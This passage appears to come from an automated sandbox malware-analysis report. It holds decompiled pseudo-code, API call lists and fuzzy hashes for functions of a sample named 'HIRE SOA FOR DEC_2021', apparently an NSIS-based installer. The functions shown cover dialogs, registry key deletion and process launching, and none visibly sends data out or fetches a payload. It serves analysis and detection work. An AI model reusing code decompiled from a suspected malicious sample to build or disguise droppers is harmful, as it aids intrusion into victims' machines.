			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bd1
0x00402bd3
0x00402bda
0x00402bdd
0x00402bdd
0x00402be3
0x00000000
0x00402be3
0x00402beb
0x00402bf1
0x00000000
0x00402bf4
0x00402bfb
0x00402c01
0x00402c07
0x00402c09
0x00402c0f
0x00402c4d
0x00402c53
0x00000000
0x00402c53
0x00402c11
0x00402c18
0x00402c29
0x00000000
0x00402c37
0x00402c18
0x00402c5a

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
GetTickCount.KERNEL32 ref: 00402BFB
CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D

Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,00003F69), ref: 00402BBE

wsprintfA.USER32 ref: 00402C29

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

... %d%%, xrefs: 00402C23

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 632923820-2449383134
Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A28(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

0x00402a49
0x00402a51
0x00402a79
0x00402a63
0x00402ab3
0x00402ab9
0x00000000
0x00402abb
0x00402a77
0x00000000
0x00000000
0x00402a77
0x00402a8e
0x00402a96
0x00402a9d
0x00402ac9
0x00000000
0x00000000
0x00402ad1
0x00402ad9
0x00000000
0x00000000
0x00000000
0x00402ad9
0x00000000
0x00402aac
0x00402ac0

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}

0x00404618
0x0040461c
0x00404624
0x00404627
0x00404628
0x0040462a
0x0040462c
0x0040462f
0x0040462f
0x00404636
0x0040463c
0x0040463c
0x00404643
0x0040464e
0x0040464f
0x00404652
0x00404652
0x0040465f
0x0040466a
0x0040466d
0x0040467f
0x00404686
0x00404687
0x00404696
0x004046a6
0x004046c2

APIs

lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
wsprintfA.USER32 ref: 004046A6
SetDlgItemTextA.USER32 ref: 004046B9

Strings

%u.%u%s%s, xrefs: 00404688

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402825
0x00402825
0x00402880
0x0040288c

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004052ee
0x0040530a
0x00405312
0x00405317
0x00000000
0x0040531d
0x00405321

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
CloseHandle.KERNEL32(?), ref: 00405317

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
Error launching installer, xrefs: 004052F8

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-1785902839
Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405578 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x00405579
0x00405590
0x00405598
0x00405598
0x004055a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
lstrcatA.KERNEL32(?,0040900C), ref: 00405598

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x00402880
0x0040288c

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F

Uniqueness

Uniqueness Score: -1.00%

Function 00403897 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
